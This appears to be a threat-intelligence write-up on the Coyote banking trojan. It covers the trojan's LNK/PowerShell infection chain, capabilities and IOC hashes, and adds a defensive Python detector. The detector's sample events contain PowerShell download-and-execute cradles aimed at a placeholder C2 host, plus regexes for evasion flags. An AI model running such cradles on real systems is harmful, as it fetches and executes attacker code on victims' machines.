Verticals Targeted: Financial
Executive Summary
Coyote, which was first observed in early 2024, is a banking trojan that has targeted over 1030 sites and 73 financial institutions.
Key Takeaways
- Coyote, which was first observed in early 2024, is a banking trojan that has targeted over 1030 sites and 73 financial institutions.
- Unlike traditional banking malware that primarily relies on phishing emails with executable attachments, Coyote takes a stealthier approach, reducing the likelihood of detection by security tools.
- Coyote uses a complex, multi-stage infection chain that relies on LNK files and PowerShell, minimizing the need for traditional executable files.
- PolySwarm analysts consider Coyote to be an evolving threat.
What is Coyote?
Coyote, which was first observed in early 2024, is a .NET banking trojan that has targeted over 1030 sites and 73 financial institutions. Fortinet recently reported on Coyote.
Unlike traditional banking malware that primarily relies on phishing emails with executable attachments, Coyote takes a stealthier approach, reducing the likelihood of detection by security tools. Fortinet researchers observed multiple LNK file artifacts containing PowerShell commands responsible for delivering Coyote. The LNK files appeared to be delivered to victims via social engineering.
The Coyote infection chain, which is multi-staged and complex, is described below:
- Execution of the LNK File – The victim opens the LNK shortcut file, initiating the embedded PowerShell command.
- Connection to a Command and Control (C2) Server – The PowerShell script reaches out to an attacker-controlled server to fetch additional malicious scripts.
- Execution of Additional Payloads – The downloaded scripts execute various tasks, including modifying system configurations, disabling security tools, and preparing for the deployment of the final payload.
- Deployment of the Coyote Banking Trojan – The malware is installed stealthily, ready to perform its core functionalities.
- Persistence Mechanisms – The Trojan sets up methods to ensure it remains active even after a system reboot.
By breaking up the infection into discrete steps, Coyote ensures that even if one phase is detected, the rest of the attack chain remains intact, making it harder to stop. The use of PowerShell minimizes the need for traditional executable files, helping the malware evade traditional antivirus solutions that primarily scan for suspicious EXE files.
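As an added illustration for defenders, not code from the report or from PolySwarm, the following Python scores process-creation events for the launch pattern described above: PowerShell started when a user opens a shortcut, with hidden-window or encoded arguments and a download cradle that fetches the next stage. The Sysmon-style fields, the regexes and the host c2.example.invalid are assumptions; the three events are constructed samples.

```python
import base64
import re

# Constructed Sysmon Event ID 1 (process creation) records, reduced to the
# fields the rule needs. Made-up examples, not samples from the Coyote report.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -nop -w hidden -c "IEX (New-Object '
                    "Net.WebClient).DownloadString('http://c2.example.invalid/s1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -EncodedCommand " + base64.b64encode(
         "iwr http://c2.example.invalid/s2 | iex".encode("utf-16le")).decode()},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",   # benign scheduled script
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# Flags that hide the console or skip profile / execution-policy controls.
EVASION_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|ep\s+bypass|executionpolicy\s+bypass)", re.I)
# Download cradles and in-memory execution used to pull a second stage from C2.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b|start-bitstransfer", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze(event):
    """Score one process-creation event; returns (score, list of reasons)."""
    reasons = []
    if not event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    cmd = event.get("CommandLine", "")
    text = cmd + " " + decode_encoded_command(cmd)   # scan decoded payload too
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (user opened a shortcut or file)")
    if ENCODED.search(cmd):
        reasons.append("encoded command line")
    if EVASION_FLAGS.search(cmd):
        reasons.append("hidden window / profile or execution-policy evasion flags")
    if CRADLE.search(text):
        reasons.append("download cradle or in-memory execution (stage-2 fetch from C2)")
    return len(reasons), reasons
```

A score of 2 or more on a workstation is a reasonable alerting threshold; the benign backup script scores 0.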
Coyote is capable of keylogging, screenshotting, clipboard hijacking, and using phishing overlays to steal credentials. The newest version of Coyote is capable of targeting 1030 sites and 73 financial institutions. Coyote targets Windows machines and has primarily affected Windows users in Brazil. PolySwarm analysts consider Coyote to be an evolving threat.
IOCs
PolySwarm has multiple samples of Coyote.
362af8118f437f9139556c59437544ae1489376dc4118027c24c8d5ce4d84e48
67f371a683b2be4c8002f89492cd29d96dceabdbfd36641a27be761ee64605b1
7cbfbce482071c6df823f09d83c6868d0b1208e8ceb70147b64c52bb8b48bdb8fd0ef425d34b56d0bc08bd93e6ecb11541bd834b9d4d417187373b17055c862e
You can use the following CLI command to search for all Coyote samples in our portal:
$ polyswarm link list -f Coyote